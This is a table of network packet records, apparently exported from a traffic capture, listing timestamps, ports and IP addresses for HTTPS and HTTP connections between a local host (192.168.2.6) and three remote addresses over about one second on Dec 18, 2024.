                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.590950012 CET49774443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667284966 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667324066 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667337894 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667346954 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667381048 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667392015 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.667444944 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668493986 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668524027 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668544054 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668554068 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668565035 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668574095 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.668615103 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765666008 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765718937 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.765886068 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766021967 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766051054 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766096115 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766189098 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766227007 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766282082 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766443014 CET49782443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766459942 CET44349782172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766581059 CET49784443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766591072 CET44349784172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766715050 CET49785443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.766726017 CET44349785172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.767934084 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.767987013 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.768484116 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.768484116 CET49783443192.168.2.6172.64.41.3
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.768527031 CET44349783172.64.41.3192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.835608959 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837295055 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837342024 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837466955 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837480068 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837512970 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.838953972 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.838967085 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.839025021 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.839241982 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.839258909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.839301109 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.840121984 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.840285063 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.840399981 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.854182959 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.854213953 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.854259968 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.854278088 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.854302883 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.854321957 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.856764078 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.856794119 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.856831074 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.856847048 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.856862068 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.856877089 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.900085926 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.900115013 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.900172949 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.900198936 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.900216103 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.900237083 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.903026104 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.903049946 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.903089046 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.903106928 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.903136015 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.903156996 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.958030939 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.958048105 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.958091974 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.961999893 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.015353918 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.031111956 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.031141996 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.031167984 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.031182051 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.031193972 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.031217098 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.042546034 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.042565107 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.042613029 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.042632103 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.042656898 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.042673111 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.046263933 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.046288967 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.046351910 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.048053980 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.048979998 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.049020052 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051642895 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051657915 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051711082 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051731110 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051757097 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051786900 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051794052 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051815987 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.051832914 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.058289051 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.058304071 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.058350086 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.062591076 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.062608004 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.062686920 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.062697887 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.062738895 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.067378044 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.067392111 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.067456961 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.071645975 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.071666002 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.071707964 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.071717978 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.071749926 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.071767092 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.074975014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.077047110 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.077097893 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.083122015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.083956003 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.084391117 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091470003 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091491938 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091496944 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091517925 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091537952 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091547012 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091624975 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091649055 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091670990 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.091684103 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.093291044 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.093307972 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.093353987 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.100454092 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.101264954 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.101305008 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.108850956 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.108865023 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.108923912 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.111484051 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.111500978 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.111548901 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.111558914 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.111608982 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.135163069 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.136584044 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.136657953 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.225349903 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.225421906 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.225445986 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.225466013 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.225508928 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.234622002 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.234711885 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.234733105 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.234795094 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.244425058 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.244452000 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.244512081 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.244525909 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.244575977 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249598980 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249619007 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249667883 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249672890 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.249713898 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256740093 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256767988 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256803036 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256808043 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.256856918 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.258027077 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.258070946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.258131027 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.260307074 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.261308908 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.261354923 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262053013 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262069941 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262110949 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262115955 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.262161016 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.265650988 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.265686989 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.265742064 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268378019 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268399000 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268445015 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268455029 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268487930 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.268507957 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.269171953 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.270016909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.270241022 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.273546934 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.273582935 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.273699999 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276441097 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276473999 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276520014 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276527882 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276565075 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.276585102 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.277452946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.277972937 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.278032064 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281693935 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281723022 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281770945 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281796932 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281829119 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.281842947 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.282613039 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.283392906 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.283442974 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.287911892 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.287950039 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.288062096 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289772987 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289805889 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289858103 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289865017 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289905071 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.289925098 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.292443037 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.292480946 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.292526007 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294363022 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294380903 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294445038 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294466019 CET44349735150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294495106 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.294509888 CET49735443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.295927048 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.296756029 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.296880960 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.298580885 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.298616886 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.298669100 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300451040 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300472975 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300520897 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300527096 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300560951 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.300580025 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.301258087 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.301294088 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.301367998 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.303399086 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.303663015 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.304071903 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.308074951 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.308578014 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.308695078 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.312748909 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.312968016 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.313002110 CET4977680192.168.2.6139.99.188.124
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.317780018 CET8049776139.99.188.124192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.395502090 CET49733443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.395529032 CET44349733150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.396666050 CET49731443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.396720886 CET44349731150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.401743889 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.401812077 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.401828051 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.401851892 CET44349734150.171.28.10192.168.2.6
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.401866913 CET49734443192.168.2.6150.171.28.10
                                                                                                                                                                                                                  Dec 18, 2024 21:06:18.401889086 CET49734443192.168.2.6150.171.28.10
